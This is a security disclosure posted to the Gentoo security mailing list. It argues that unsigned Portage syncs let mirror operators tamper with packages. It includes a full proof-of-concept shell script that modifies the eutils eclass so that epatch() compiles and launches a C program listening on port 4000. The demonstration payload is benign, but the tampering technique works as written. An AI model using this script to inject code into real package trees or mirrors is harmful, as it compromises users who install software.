1 |
Hi, |
2 |
|
3 |
after 1.5 years (2 years after the bug could could found in bugzilla) it |
4 |
seems that one of the highest security risks is closed. At least I've |
5 |
seen something about signed ebuilds. (see |
6 |
http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ). |
7 |
|
8 |
Time for the next part. I've already written a bug for that a year ago, |
9 |
but it was now closed a second time by "the ... gatekeeper". |
10 |
|
11 |
See bug #26110 |
12 |
|
13 |
Here's the next small script. If you are operating a gentoo mirror, or |
14 |
having access to one, feel free to play with it. |
15 |
|
16 |
If you are a user, the only practical way to ensure a minimum of |
17 |
security is to sync twice: |
18 |
(a) sync, |
19 |
(b) delete timestap, |
20 |
(c) sync with other mirror and |
21 |
(d) look if no files where different, otherwise restart with (a) |
22 |
|
23 |
----------------gentooTrojan.sh--------------------------- |
24 |
#!/bin/sh |
25 |
if [ ${#} -ne 1 ] ; then |
26 |
echo "This script puts a silly trojan into Gentoo's portage." |
27 |
echo "Usage: `basename ${0}` PathToPortage" |
28 |
exit 1 |
29 |
fi |
30 |
|
31 |
mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass |
32 |
sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with |
33 |
telnet localhost 4000.\nKill it with killall |
34 |
GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:' |
35 |
<${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass |
36 |
cat >${1}/eclass/GentooTrojan.c << EOF |
37 |
#include <unistd.h> |
38 |
#include <sys/socket.h> |
39 |
#include <netinet/in.h> |
40 |
#include <string.h> |
41 |
|
42 |
int main(void) |
43 |
{ |
44 |
struct sockaddr_in serv; |
45 |
struct sockaddr_in cli; |
46 |
int sock; |
47 |
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); |
48 |
if (sock < 0) |
49 |
return 1; |
50 |
bzero((char *) &serv, sizeof(serv)); |
51 |
serv.sin_family = AF_INET; |
52 |
serv.sin_addr.s_addr = htonl(INADDR_ANY); |
53 |
serv.sin_port = htons(4000); |
54 |
if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) |
55 |
return 1; |
56 |
if (listen(sock, 5) < 0) |
57 |
return 1; |
58 |
while (1) { |
59 |
int scli; |
60 |
int slen; |
61 |
static char *str="Your are listing to the famous Gentoo trojan!\n"; |
62 |
slen = sizeof(cli); |
63 |
scli = accept(sock, (struct sockaddr *) &cli, |
64 |
(socklen_t *) &slen); |
65 |
write(scli, str, strlen(str)); |
66 |
close(scli); |
67 |
} |
68 |
} |
69 |
EOF |
70 |
|
71 |
gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c |
72 |
|
73 |
echo "Done. Portage successful infected with a trojan." |
74 |
echo "Just emerge an ebuild which uses epatch and do a" |
75 |
echo " telnet localhost 4000" |
76 |
echo "afterwards." |
77 |
------------------------------------------- |
78 |
|
79 |
Kind regards, |
80 |
|
81 |
Alexander Holler |
82 |
|
83 |
|
84 |
PS: Please don't reply to me, I don't read any Gentoo mailing lists |
85 |
anymore, in fact I even don't know why I'm writting this message, as I |
86 |
already have lost every interest in Gentoo some time ago. |
87 |
|
88 |
PPS: Sorry for that hard words, but that all reminds me on Microsoft. |
89 |
The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting |
90 |
forgotten, ignored or fixed in the same time. |
91 |
|
92 |
PPPS: I really appreciate all the very good work on hardened gcc, |
93 |
selinux-profiles and so on, but for me, this all seems useless as long |
94 |
as the base is compromised that easy and the user has no practical way |
95 |
(e.g. hashs) to check what he gets on his machine with a 'sync'. |
96 |
|
97 |
-- |
98 |
gentoo-security@g.o mailing list |